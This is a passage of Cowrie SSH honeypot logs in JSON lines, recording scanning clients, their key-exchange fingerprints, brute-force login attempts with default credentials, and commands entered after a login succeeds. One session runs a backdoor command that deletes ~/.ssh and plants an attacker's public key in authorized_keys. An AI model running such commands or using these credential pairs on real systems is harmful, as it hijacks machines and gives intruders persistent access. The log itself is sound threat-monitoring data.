bc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:00:19.002162Z","src_ip":"171.243.150.185","session":"fcf514b38623"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-28T18:00:20.388375Z","src_ip":"171.243.150.185","session":"fcf514b38623"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:22.564245Z","src_ip":"171.243.150.185","session":"fcf514b38623"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59798,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e36efc0fb53","protocol":"ssh","message":"New connection: 212.227.125.160:59798 (1.2.3.4:22) [session: 7e36efc0fb53]","sensor":"my-vps","timestamp":"2025-08-28T18:00:27.270564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:00:27.273532Z","src_ip":"212.227.125.160","session":"7e36efc0fb53"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T18:00:27.328751Z","src_ip":"212.227.125.160","session":"7e36efc0fb53"}
{"eventid":"cowrie.login.failed","username":"opnsense","password":"opnsense","message":"login attempt [opnsense/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T18:00:27.499033Z","src_ip":"212.227.125.160","session":"7e36efc0fb53"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:28.587665Z","src_ip":"212.227.125.160","session":"7e36efc0fb53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34274,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ea8b4cf7d89","protocol":"ssh","message":"New connection: 212.227.125.160:34274 (1.2.3.4:22) [session: 6ea8b4cf7d89]","sensor":"my-vps","timestamp":"2025-08-28T18:00:34.919941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:00:34.921132Z","src_ip":"212.227.125.160","session":"6ea8b4cf7d89"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:00:35.176072Z","src_ip":"212.227.125.160","session":"6ea8b4cf7d89"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T18:00:39.295681Z","src_ip":"212.227.125.160","session":"6ea8b4cf7d89"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:46.438425Z","src_ip":"212.227.125.160","session":"6ea8b4cf7d89"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49532,"dst_ip":"1.2.3.4","dst_port":22,"session":"23fbc06a4f40","protocol":"ssh","message":"New connection: 217.72.205.35:49532 (1.2.3.4:22) [session: 23fbc06a4f40]","sensor":"my-vps","timestamp":"2025-08-28T18:00:57.690312Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:57.691631Z","src_ip":"217.72.205.35","session":"23fbc06a4f40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58826,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b15d7715a45","protocol":"ssh","message":"New connection: 212.227.125.160:58826 (1.2.3.4:22) [session: 8b15d7715a45]","sensor":"my-vps","timestamp":"2025-08-28T18:00:59.717980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:00:59.718952Z","src_ip":"212.227.125.160","session":"8b15d7715a45"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:01:01.433485Z","src_ip":"212.227.125.160","session":"8b15d7715a45"}
{"eventid":"cowrie.session.connect","src_ip":"112.17.139.236","src_port":46414,"dst_ip":"1.2.3.4","dst_port":22,"session":"a087a196e3ae","protocol":"ssh","message":"New connection: 112.17.139.236:46414 (1.2.3.4:22) [session: a087a196e3ae]","sensor":"my-vps","timestamp":"2025-08-28T18:01:03.328475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:01:03.329583Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:01:03.621149Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.login.success","username":"root","password":"password1234","message":"login attempt [root/password1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:01:04.540547Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:01:05.033664Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:01:05.034560Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:01:05.035748Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:05.252032Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:01:06.193922Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.194835Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.421866Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.423128Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.session.connect","src_ip":"112.17.139.236","src_port":47166,"dst_ip":"1.2.3.4","dst_port":22,"session":"09bde3523840","protocol":"ssh","message":"New connection: 112.17.139.236:47166 (1.2.3.4:22) [session: 09bde3523840]","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.632083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.634338Z","src_ip":"112.17.139.236","session":"09bde3523840"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:01:06.851728Z","src_ip":"112.17.139.236","session":"09bde3523840"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:01:07.911888Z","src_ip":"112.17.139.236","session":"09bde3523840"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:09.127729Z","src_ip":"112.17.139.236","session":"09bde3523840"}
{"eventid":"cowrie.session.connect","src_ip":"112.17.139.236","src_port":47890,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f74c17defdf","protocol":"ssh","message":"New connection: 112.17.139.236:47890 (1.2.3.4:22) [session: 5f74c17defdf]","sensor":"my-vps","timestamp":"2025-08-28T18:01:09.434457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:01:09.435485Z","src_ip":"112.17.139.236","session":"5f74c17defdf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:01:09.695675Z","src_ip":"112.17.139.236","session":"5f74c17defdf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:01:10.798251Z","src_ip":"112.17.139.236","session":"5f74c17defdf"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:11.007359Z","src_ip":"112.17.139.236","session":"a087a196e3ae"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:01:11.054296Z","src_ip":"112.17.139.236","session":"5f74c17defdf"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":35734,"dst_ip":"1.2.3.4","dst_port":22,"session":"029e18d3d936","protocol":"ssh","message":"New connection: 199.195.253.95:35734 (1.2.3.4:22) [session: 029e18d3d936]","sensor":"my-vps","timestamp":"2025-08-28T18:01:22.907031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:01:22.924980Z","src_ip":"199.195.253.95","session":"029e18d3d936"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 